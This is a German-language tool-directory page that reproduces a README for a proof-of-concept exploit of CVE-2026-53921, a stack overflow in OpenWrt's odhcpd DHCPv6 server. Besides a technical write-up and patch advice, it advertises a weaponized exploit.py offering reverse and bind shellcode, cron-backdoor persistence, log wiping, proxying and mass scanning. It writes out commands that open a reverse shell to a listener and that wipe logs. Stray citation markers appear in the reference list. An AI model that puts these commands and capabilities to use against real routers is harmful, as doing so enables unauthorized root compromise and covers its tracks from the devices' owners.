Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ Detaillierter und umfassender Write-Up sowie Verifier & Multi-Exploit für OpenWrt DHCPv6 RCE. Dual-Vektor (IA_NA/IA_PD) Overflow mit MIPS/ARM-Shellcode, ROP-Ketten, SOCKS5-Proxy, Persistenz, Log-Wiping und Massen-Scanning. Nutze es ethisch, bleib legal. 🔒 | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
Embedded-System-SicherheitAufklärungExploit-FrameworksIoT-SicherheitSchwachstellenanalyseExploitationPost-ExploitationRed TeamingShellcode-Generierung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ Detaillierter und umfassender Write-Up sowie Verifier & Multi-Exploit für OpenWrt DHCPv6 RCE. Dual-Vektor (IA_NA/IA_PD) Overflow mit MIPS/ARM-Shellcode, ROP-Ketten, SOCKS5-Proxy, Persistenz, Log-Wiping und Massen-Scanning. Nutze es ethisch, bleib legal. 🔒

Payload-Entwicklung
Binary-Exploitation
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

Repository anzeigen
68vor 1 MonatNoch nicht geprüft
Teilen

CVE-2026-53921

CVE-2026-53921 – Stack-Überlauf in odhcpd

CVE CVSS OpenWrt

⚠️ Nur für Bildungszwecke und autorisierte Tests. Unbefugte Nutzung ist illegal.


📖 Schwachstellenübersicht

CVE-2026-53921 ist ein kritischer Stack-Pufferüberlauf im odhcpd-Daemon von OpenWrt – dem Standard-DHCPv6-/DHCPv4-/RA-Server.

🔍 So funktioniert es

Die Schwachstelle befindet sich im DHCPv6-Nachrichtenverarbeitungscode von odhcpd, insbesondere in den Funktionen build_ia() und dhcpv6_ia_handle_IAs().

Technischer Tiefgang

1. Die Grundursache

Der Fehler tritt während der Serialisierung (Verpackung) von DHCPv6-Reply-Paketen auf. Wenn odhcpd auf Client-Anfragen antwortet, erstellt es die Antwort in einem Stack-Puffer fester Größe von 512 Bytes ohne ordnungsgemäße Grenzprüfung.

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. Auslösen des Überlaufs

Ein Angreifer sendet eine DHCPv6-Request (oder Solicit) mit:

  • 5 oder mehr IA_NA-Optionen (Identity Association for Non-temporary Address), die jeweils eine IAAddress-Unteroption enthalten.
  • 22 oder mehr IA_PD-Optionen (Identity Association for Prefix Delegation).

Jede Option verbraucht Stack-Speicher, während odhcpd die Reply aufbaut. Die angesammelten Daten überschreiten 512 Bytes und verursachen den Überlauf.

3. Zwei Overflow-Vektoren


Vektor Auslöser Überlaufpunkt


Site 1 5 IA_NA-Optionen build_ia() für IA_NA mit IPv6-Adressen

Site 2 22 IA_PD-Optionen build_ia() für IA_PD

Die Grundursache ist identisch, aber der Überlauf tritt in verschiedenen Codepfaden auf, wodurch beide Vektoren gleichermaßen ausnutzbar sind.

4. Speicherlayout

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

Der Angreifer überschreibt die gespeicherte Rücksprungadresse, sodass sie auf seinen Shellcode im Speicher zeigt.

5. Anforderungen an die Ausnutzung


Anforderung Beschreibung


Netzwerkzugriff Der Angreifer muss IPv6-Konnektivität zum Ziel haben

Authentifizierung Keine -- Angriff ohne Authentifizierung

Privilegien odhcpd läuft als root, daher ermöglicht RCE die vollständige Kontrolle über das System

Zieldienst UDP-Port 547 (DHCPv6) muss offen sein

6. Shellcode-Platzierung

Bei einem echten Exploit wird der Shellcode des Angreifers in den IPv6-Adressfeldern der IAAddress platziert (16 Bytes pro IA_NA). Die präparierten Pakete verpacken Shellcode, NOP-Sled und Rücksprungadresse in diese Felder.

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. Auswirkungskette

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. Angriffsvektoren vs. Patch-Status

Version Status RCE möglich?


odhcpd < e432dd6 Verwundbar ✅ Ja OpenWrt < 24.10.8 Verwundbar ✅ Ja OpenWrt < 25.12.5 Verwundbar ✅ Ja OpenWrt 24.10.8+ Behoben ❌ Nein OpenWrt 25.12.5+ Behoben ❌ Nein odhcpd master + e432dd6 Behoben ❌ Nein

9. Ausnutzung in der Praxis

Diese Schwachstelle ist besonders gefährlich, weil:

  • odhcpd ist bei OpenWrt-Installationen standardmäßig aktiviert.
  • Keine Authentifizierung erforderlich---jedes Gerät im selben IPv6-Segment kann angreifen.
  • Der Fehler liegt im Anfragenverarbeitungspfad.
  • Stack-Canaries und ASLR sind auf eingebetteten MIPS/ARM-Geräten selten vorhanden.
  • Der Exploit kann in vielen eingebetteten Umgebungen gängige Schutzmaßnahmen umgehen.

🎯 Betroffene Versionen

KomponenteVerwundbare VersionenBehoben in
odhcpd (master branch)vor Commit e432dd6e432dd6 oder später
OpenWrt-Releases< 24.10.8 < 25.12.5

🧰 Werkzeuge

Dieses Repository enthält zwei unabhängige Skripte:

SkriptZweckExploit-CodeSicherheit
verifier.pyNicht-intrusiver Schwachstellencheck❌ Nein✅ Sicher
exploit.pyVollständig waffenfähiger Exploit

🔎 verifier.py – Schwachstellenprüfer

  • Sendet eine standardmäßige DHCPv6-Solicit-Nachricht, um zu prüfen, ob der Dienst aktiv ist.
  • Liest HTTP/SSH-Banner, um die OpenWrt-Version zu erkennen.
  • Vergleicht die Version mit dem bekannten verwundbaren Bereich.
  • Sendet keine Overflow-Payload oder Shellcode.

💥 exploit.py – Vollständiger Exploit

  • Dual-Overflow-Vektoren: IA_NA (Site1) und IA_PD (Site2).
  • Automatische Architekturerkennung (MIPS / ARM).
  • MIPS-Big-Endian-Reverse- und Bind-Shellcode.
  • Unterstützung für SOCKS5-Proxy.
  • Persistenz (Cron-Backdoor) und Log-Wiping.
  • Thread-basiertes Scannen & Massenausnutzung.
  • Optionale Payload-Kodierung (XOR).

🚀 Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 Verwendung

🔍 Verifier – prüfen, ob ein Ziel verwundbar ist

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 Exploit – eine Reverse-Shell erhalten (nicht für illegale Aktivitäten verwenden, nur zu Testzwecken)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ Befehlszeilenoptionen

verifier.py

ArgumentBeschreibung
-u, --targetZiel-IPv6-Adresse (erforderlich)
-i, --ifaceNetzwerkschnittstelle (Standard: eth0)

exploit.py

🧪 Beispielszenarien

1. Eine Liste von Zielen scannen

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Ein einzelnes Ziel mit Bind-Shell ausnutzen
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. SOCKS5-Proxy + Persistenz + Log-Wiping verwenden
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ Gegenmaßnahmen

Aktualisieren Sie OpenWrt auf 24.10.8 oder 25.12.5 oder neuer.

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 Referenzen

Offizielle Quellen

  • OpenWrt Security Advisory (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 Ausführliche Sicherheitsmeldung, die beide Overflow-Vektoren in odhcpd abdeckt.

  • CVE-2026-53921 NVD Entry https://nvd.nist.gov/vuln/detail/CVE-2026-53921 Offizieller Eintrag in der NIST-Schwachstellendatenbank.

  • OpenWrt 24.10.8 Release Notes https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 Offizielle Versionsankündigung für den 24.10-Zweig.

  • OpenWrt 25.12.5 Release Notes https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html Offizielle Versionsankündigung für den 25.12-Zweig.

Verwandte CVEs, die im selben Release behoben wurden

Die Releases 24.10.8 und 25.12.5 beheben mehrere odhcpd-Schwachstellen über CVE-2026-53921 hinaus [citation:9]:

Technische Analysen & Write-ups

  • The Hacker News Analysis https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html Detaillierte technische Aufschlüsselung der Schwachstelle und der Ausnutzungsvektoren. [citation:1]

  • GitHub PoC Repository https://github.com/0xBlackash/CVE-2026-53921 Öffentliche Proof-of-Concept-Implementierungen und technische Details. [citation:3]

Zusätzliche Sicherheitskorrekturen in 25.12.5

Version 25.12.5 behebt außerdem Schwachstellen in anderen Kernkomponenten [citation:10]:

  • uhttpd: HTTP-Request-Smuggling (CVE-2026-55612, CVE-2026-55614)
  • LuCI: Mehrere Privilegieneskalations- und XSS-Schwachstellen
  • cgi-io: Authentifizierter Path Traversal
  • Linux-Kernel: Aktualisiert auf 6.12.94 mit mehreren CVEs
  • OpenSSL: Aktualisiert auf 3.5.7, zahlreiche CVEs wurden behoben
  • Dropbear SSH: CVE-2019-6111 und CVE-2026-35385 behoben

Unterstützende Dokumentation

  • OpenWrt Firmware Selector https://firmware-selector.openwrt.org/ Laden Sie gepatchte Firmware-Images für Ihr Gerät herunter.

  • CISA Known Exploited Vulnerabilities Catalog https://www.cisa.gov/known-exploited-vulnerabilities-catalog Prüfen Sie, ob CVE-2026-53921 zum KEV-Katalog hinzugefügt wurde (Stand 27. Juli 2026: nicht gelistet). [citation:1]

Tool herunterladen

24.10.8 & 25.12.5
✅ Ja
⚠️ Gefährlich
ArgumentBeschreibung
-u, --targetZiel-IPv6-Adresse
-l, --listDatei mit einer Liste von Zielen
-i, --ifaceNetzwerkschnittstelle (Standard: eth0)
--lhostListener-IP (erforderlich)
--lportListener-Port (Standard: 4444)
--vectorsite1, site2 oder both (Standard: both)
--offsetStack-Offset (Standard: 512)
--retRücksprungadresse in Hex (z. B. 0x7ffff000)
--archmips oder arm erzwingen (Auto-Erkennung, falls ausgelassen)
--payloadreverse oder bind (Standard: reverse)
--encodenone oder xor (Standard: none)
--proxy-hostSOCKS5-Proxy-IP
--proxy-portSOCKS5-Proxy-Port (Standard: 1080)
--persistenceCron-Backdoor installieren
--clear-logsSyslog nach der Ausnutzung löschen
--scan-onlyNur Ziele scannen, nicht ausnutzen
--threadsAnzahl der Threads für das Scannen (Standard: 5)
--verboseAusführliche Protokollierung
CVE IDSchweregradBeschreibung
CVE-2026-53918HochUse-after-free im DHCPv6-IA-Handler [citation:4][citation:9]
CVE-2026-53920HochStack-Speicheroffenlegung durch abgeschnittene DHCPv6-IA_NA/IA_PD-Option [citation:9]
CVE-2026-53922MittelPre-Auth-Denial-of-Service durch size_t-Unterlauf [citation:9]
CVE-2026-55606MittelStack-Puffer-Overread durch DUID-Längen-Endianness-Konflikt [citation:9]
CVE-2026-62948-DHCPv6-Hostname-Injection, die zu gespeichertem XSS führt [citation:1]
CVE-2026-62947-Authentifizierter Path Traversal in cgi-io [citation:1]